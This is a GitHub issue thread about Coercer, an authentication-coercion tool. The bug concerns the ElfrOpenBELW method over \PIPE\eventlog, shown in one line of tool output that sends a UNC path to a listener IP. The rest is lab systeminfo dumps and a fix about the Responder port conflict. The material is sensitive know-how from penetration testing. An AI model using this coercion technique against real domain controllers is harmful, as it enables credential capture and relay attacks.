Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work. #53

Closed
Shawn24pr opened this issue May 24, 2023 · 5 comments
Closed

[bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work. #53

Shawn24pr opened this issue May 24, 2023 · 5 comments
Assignees
@p0dalirius
Labels
bug Something isn't working waiting-for-response waiting-for-response

Comments

@Shawn24pr
Copy link 

[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\192.168.1.101\r1Qr8iIe\aa')
@p0dalirius p0dalirius self-assigned this May 24, 2023
@p0dalirius p0dalirius changed the title The even feature doesn't work. [bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work. May 24, 2023
@p0dalirius p0dalirius added the bug Something isn't working label May 24, 2023
@p0dalirius
Copy link
Owner

Hi,

I just tested it on the following system:

C:\Users\Administrator>systeminfo

Host Name:                 TDC01
OS Name:                   Microsoft Windows Server 2019 Standard Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00431-10000-00000-AA171
Original Install Date:     2/3/2023, 1:17:55 PM
System Boot Time:          5/24/2023, 2:25:37 PM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              fr;French (France)
Time Zone:                 (UTC+01:00) Brussels, Copenhagen, Madrid, Paris
Total Physical Memory:     8,192 MB
Available Physical Memory: 6,087 MB
Virtual Memory: Max Size:  9,472 MB
Virtual Memory: Available: 7,426 MB
Virtual Memory: In Use:    2,046 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    DOMAIN.local
Logon Server:              \\TDC01
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4514366
                           [02]: KB4486153
                           [03]: KB4512577
                           [04]: KB4512578
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.254
                                 IP address(es)
                                 [01]: 192.168.1.71
                                 [02]: fe80::8de7:7100:8d37:e712
                                 [03]: 2001:861:8c80:e2e0:8de7:7100:8d37:e712
                                 [04]: 2001:861:8c80:e2e0:1d3b:a11a:bc84:4a25
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

And I got the following results;

image

Can you provide more details on the configuration of your environment?

Best regards,

@p0dalirius p0dalirius added the waiting-for-response waiting-for-response label May 24, 2023
@Shawn24pr
Copy link
Author

Hi there,

system config below:

C:\Users\Administrator>systeminfo

Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-70000-00000-AA587
Original Install Date:     5/23/2023, 10:22:52 AM
System Boot Time:          5/23/2023, 9:04:04 PM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 140 Stepping 1 GenuineIntel ~1805 Mhz
BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.1, 4/6/2022
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,739 MB
Available Physical Memory: 830 MB
Virtual Memory: Max Size:  4,147 MB
Virtual Memory: Available: 2,020 MB
Virtual Memory: In Use:    2,127 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    lab.local
Logon Server:              \\DC01
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5004335
                           [02]: KB5005112
                           [03]: KB5005030
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.1.120
                                 [02]: fe80::90d2:35ec:fc30:200f
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Just cloned the repo now and noticed that even though after providing --filter-pipe-name, it scans all of them:

image

@p0dalirius
Copy link
Owner

I opened an issue for the --filter-pipe-name option and will fix it (#54)

@p0dalirius
Copy link
Owner

Well yes, if you have Responder running and using Coercer in scan mode it cannot work. Since Responder is listenning on port 445 to receive incomming SMB authentications and Coercer will do the same.

In scan mode you need to be able to listen on the 445 port on your machine

@Shawn24pr
Copy link
Author

Closing

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@p0dalirius p0dalirius

Labels
bug Something isn't working waiting-for-response waiting-for-response
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@p0dalirius @Shawn24pr